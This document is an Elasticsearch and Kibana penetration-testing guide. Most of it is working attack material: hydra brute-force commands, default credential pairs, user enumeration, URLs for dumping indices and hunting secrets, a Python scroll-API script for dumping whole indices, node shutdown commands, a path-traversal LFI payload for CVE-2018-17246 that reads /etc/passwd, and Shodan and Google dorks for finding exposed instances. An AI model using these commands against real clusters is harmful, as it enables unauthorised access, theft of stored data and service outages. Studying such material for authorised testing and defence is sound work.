ElasticSearch Pentesting

ElasticSearch exploit and Pentesting guide for penetration tester

What is an Elasticsearch index?

An Elasticsearch index is a named collection of related JSON documents; Elasticsearch stores all data as JSON documents inside indices. Everything below is reached over the REST API, by default on TCP port 9200, and most of it is a plain GET, so a browser or curl is all you need.

Brute Force Credentials

hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /

Use https-get instead of http-get when the cluster is behind TLS. Before brute forcing, check whether authentication is enforced at all: if an unauthenticated GET / returns 200 with the cluster name and version, security is disabled and every endpoint below is open.

Default credentials

curl -X GET http://admin:elasticadmin@target:9200/
curl -X GET http://elastic:changeme@target:9200/

elastic:changeme was the shipped password for X-Pack security on 5.x; from 6.0 on the bootstrap password is generated at install time and set with elasticsearch-setup-passwords, so on a current cluster it only works when an admin put it back deliberately. A 200 with cluster info confirms the pair; a 401 means keep going.

Basic User Enumeration

These endpoints need an authenticated user holding the manage_security cluster privilege (the built-in superuser role has it); without credentials they return 401. On 6.x and earlier the same APIs live under _xpack/security/ instead of _security/.

# List all roles on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role"

# List all users on the system:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"

# Get more information about the rights of a user:
curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"

Elastic Info

The bare _cluster/, _remote/ and _security/ paths are not endpoints and only return an error; the useful sub-paths are below. All of them work unauthenticated on an open cluster; add credentials with curl's -u option when security is enabled.

curl -X GET http://target:9200/                                   # version, cluster name, build
curl -X GET http://target:9200/_cat/                              # lists the available _cat endpoints
curl -X GET "http://target:9200/_cat/nodes?v"                     # node names, IPs, roles, current master
curl -X GET "http://target:9200/_cat/plugins?v"                   # installed plugins
curl -X GET "http://target:9200/_cluster/health?pretty"
curl -X GET "http://target:9200/_cluster/state?pretty"            # full cluster metadata incl. index mappings
curl -X GET "http://target:9200/_nodes?pretty"                    # OS, JVM, install paths, node settings
curl -X GET "http://target:9200/_remote/info?pretty"              # cross-cluster search targets
curl -X GET "http://target:9200/_security/_authenticate?pretty"   # who you are authenticated as and your roles

List All indexes

http://target:9200/_cat/indices?v&s=docs.count

v adds the header row and s= sorts on a column (append :desc to put the largest indices first). Index names alone (customers, logs-*, .kibana, .security) usually tell you where the interesting data is before you dump anything.

Dump index

http://target:9200/<index>/_search?pretty=true&size=100
http://target:9200/bank/_search?pretty=true

size is capped by index.max_result_window (10,000 by default) and from/size paging is refused past that window, so a single URL shows at most the first 10,000 hits. For a full copy of a large index use the scroll API (or search_after) instead.

Dump all

http://target:9200/_search?pretty=true

search

http://target:9200/_search?pretty=true&q=<search_term>
http://target:9200/<index>/_search?pretty=true&q=<search_term>

q takes Lucene query-string syntax: a bare term is matched against every field, field:value restricts it to one field, and wildcards (*) and AND/OR operators work as usual. Terms such as password, secret, token or api_key are the usual first pass over an unknown index.
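The three URL forms above (dump an index, dump everything, search with q=) all stop at one page. The following is an added example for this guide, not code from the original page or from Elastic: it walks a whole result set with the scroll API, applies the same Lucene q= filter, refuses page sizes above the 10,000 result window, and releases the scroll context afterwards. The host, index name and credentials are placeholders; fake_cluster is a constructed in-memory stand-in for a cluster so the paging logic runs offline.

```python
"""Scroll-based dump of an Elasticsearch index (added example, not from the
original guide). Host, index and credentials are placeholders; `fake_cluster`
is a constructed test double so the paging logic runs without a target."""
import base64
import json
import urllib.request
from typing import Callable, Iterator, List, Optional

# fetch(method, path, json_body) -> parsed JSON response
Fetch = Callable[[str, str, Optional[dict]], dict]

MAX_RESULT_WINDOW = 10_000  # Elasticsearch default for index.max_result_window


def http_fetch(base_url: str, user: Optional[str] = None,
               password: str = "") -> Fetch:
    """Return a Fetch over urllib with optional HTTP Basic credentials."""
    headers = {"Content-Type": "application/json"}
    if user is not None:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        headers["Authorization"] = f"Basic {token}"

    def fetch(method: str, path: str, body: Optional[dict]) -> dict:
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(base_url.rstrip("/") + path, data=data,
                                     method=method, headers=headers)
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)

    return fetch


def dump_index(fetch: Fetch, index: str = "_all", q: Optional[str] = None,
               page_size: int = 1000, scroll: str = "1m") -> Iterator[dict]:
    """Yield every hit of `index` (default: all indices), optionally filtered
    by the Lucene query string `q` (same syntax as `_search?q=`). A plain
    `_search?size=N` returns one page and is capped by max_result_window;
    the scroll API walks the whole result set page by page."""
    if page_size > MAX_RESULT_WINDOW:
        raise ValueError(f"page_size exceeds index.max_result_window "
                         f"({MAX_RESULT_WINDOW}); use a smaller page")
    query = {"query_string": {"query": q}} if q else {"match_all": {}}
    resp = fetch("POST", f"/{index}/_search?scroll={scroll}",
                 {"size": page_size, "query": query})
    scroll_id = resp.get("_scroll_id")
    try:
        while resp["hits"]["hits"]:
            yield from resp["hits"]["hits"]
            if scroll_id is None:  # server returned no cursor: single page
                break
            resp = fetch("POST", "/_search/scroll",
                         {"scroll": scroll, "scroll_id": scroll_id})
            scroll_id = resp.get("_scroll_id", scroll_id)
    finally:
        if scroll_id is not None:  # release the server-side scroll context
            fetch("DELETE", "/_search/scroll", {"scroll_id": scroll_id})


def dump_sources(fetch: Fetch, index: str = "_all", q: Optional[str] = None,
                 page_size: int = 1000) -> List[dict]:
    """The `_source` of every hit as a list."""
    return [hit["_source"] for hit in dump_index(fetch, index, q, page_size)]


# ---- constructed test double, not a real cluster --------------------------
SAMPLE_DOCS = [  # constructed sample documents in the style of a `bank` index
    {"_index": "bank", "_id": str(i),
     "_source": {"account": 1000 + i, "email": f"user{i}@example.org"}}
    for i in range(7)
]


def fake_cluster(docs: List[dict]) -> Fetch:
    """Emulate the scroll endpoints of a cluster holding `docs`: pages in the
    requested size, one cursor per scroll id; index and query are ignored."""
    cursors = {}
    counter = [0]

    def fetch(method: str, path: str, body: Optional[dict]) -> dict:
        if method == "DELETE":
            cursors.pop(body["scroll_id"], None)
            return {"succeeded": True}
        if path.startswith("/_search/scroll"):
            sid = body["scroll_id"]
            pos, size = cursors[sid]
        else:
            counter[0] += 1
            sid, pos, size = f"scroll-{counter[0]}", 0, body["size"]
        cursors[sid] = (pos + size, size)
        return {"_scroll_id": sid, "hits": {"hits": docs[pos:pos + size]}}

    return fetch


if __name__ == "__main__":
    # Offline demo; for a real target swap in
    # http_fetch("http://target:9200", "elastic", "changeme") (placeholders).
    for row in dump_sources(fake_cluster(SAMPLE_DOCS), "bank", page_size=3):
        print(json.dumps(row))
```

Against a real cluster, pass index="_all" for the "dump all" case and a q such as email:*@corp.example for a targeted pull; the DELETE in the finally block matters on shared targets, since every open scroll pins segments on the server until it expires.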

Shutting Down Nodes

curl -X POST http://target:9200/_shutdown
curl -X POST http://target:9200/_cluster/nodes/_master/_shutdown

These are the 1.x node-shutdown endpoints; they were removed in Elasticsearch 2.0, so on any current version they only return an error. Where they still work they stop the process for every user of the cluster, so treat them as a destructive action that needs explicit sign-off in the rules of engagement.

Elastic Search Kibana Console LFI (CVE-2018-17246)

CVE-2018-17246 is a local file inclusion in the Kibana Console (Dev Tools) plugin, fixed in Kibana 6.4.3 and 5.6.13. It lives on the Kibana port (5601 by default), not on the Elasticsearch port, so point the request at Kibana:

http://target:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

Google Dorks to find Kibana Instances

inurl:app/kibana
inurl:app/kibana intext:"Loading Kibana"
inurl:":5601/app/kibana"

Shodan Dorks to find Kibana Instances

port:9200 elasticsearch
title:"kibana" port:"443"
kibana content-length: 217